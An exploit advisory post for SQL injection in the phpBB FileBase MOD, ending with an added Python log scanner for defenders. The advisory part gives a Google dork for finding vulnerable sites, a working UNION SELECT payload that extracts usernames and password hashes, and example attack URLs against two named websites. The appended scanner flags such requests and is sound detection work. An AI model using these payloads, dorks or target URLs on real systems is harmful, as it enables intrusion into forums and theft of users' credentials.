--==+================================================================================+==--
--==+ [phpBB MOD] FileBase SQL Injection Vulnerabilities +==--
--==+================================================================================+==--
AUTHOR: kimmo
SITE: indonesianhacker.org
DORK: inurl:"filebase.php" "Powered by phpBB" or inurl:"filebase.php"
DESCRIPTION:
EXPLOITS:
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
NOTE/TIP:
The phpbb table prefix may need changing.
GREETZ: indonesianhacker.org, and all members!
--==+================================================================================+==--
--==+ [phpBB MOD] FileBase SQL Injection Vulnerabilities +==--
--==+================================================================================+==--
Example:
http://www.crymod.com/filebase.php?fileid=-1073/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat%28username,char%2858%29,user_password%29,12,13,14/**/FROM/**/phpbb_users/*
http://www.mycrysis.com/filebase.php?fileid=-9389/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
=====================================================================================
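For defenders, an added detection example (not part of the original advisory and not code from the FileBase MOD): it scans web access-log lines for filebase.php requests whose id or fileid value is not a plain integer, which is the shape of the requests shown above. It assumes those two parameters are integer record ids and that logs use the combined log format; the function name findings and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: these parameters are plain integer record ids in normal use.
ID_PARAMS = {"id", "fileid"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers seen in the advisory's request: UNION ... SELECT, SQL comments, concat().
SQL_RE = re.compile(r"\bunion\b.*\bselect\b|/\*|\bconcat\s*\(", re.I | re.S)

def findings(log_line):
    """Return [(param, decoded_value, looks_like_sqli)] for one access-log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/filebase.php"):
        return []
    out = []
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name.lower() not in ID_PARAMS:
            continue
        for value in values:
            value = unquote(value)  # second decode catches double-encoded input
            if not re.fullmatch(r"[0-9]+", value):
                out.append((name, value, bool(SQL_RE.search(value))))
    return out

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Feb/2010:10:00:01 +0000] '
    '"GET /filebase.php?d=1&id=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Feb/2010:10:00:05 +0000] '
    '"GET /filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3/* HTTP/1.1" 200 7301',
    '203.0.113.9 - - [02/Feb/2010:10:00:09 +0000] '
    '"GET /filebase.php?fileid=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1%2C2%2F%2A'
    ' HTTP/1.1" 200 7290',
    '198.51.100.4 - - [02/Feb/2010:10:01:00 +0000] '
    '"GET /viewtopic.php?t=-1/**/UNION HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, 1):
        for param, value, sqli in findings(line):
            label = "SQLi pattern" if sqli else "non-integer id"
            print(f"line {number}: {label} in {param}={value!r}")
```

The same integer-only rule is what the script itself should enforce on these parameters before they reach a query.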
Tuesday, 02 February 2010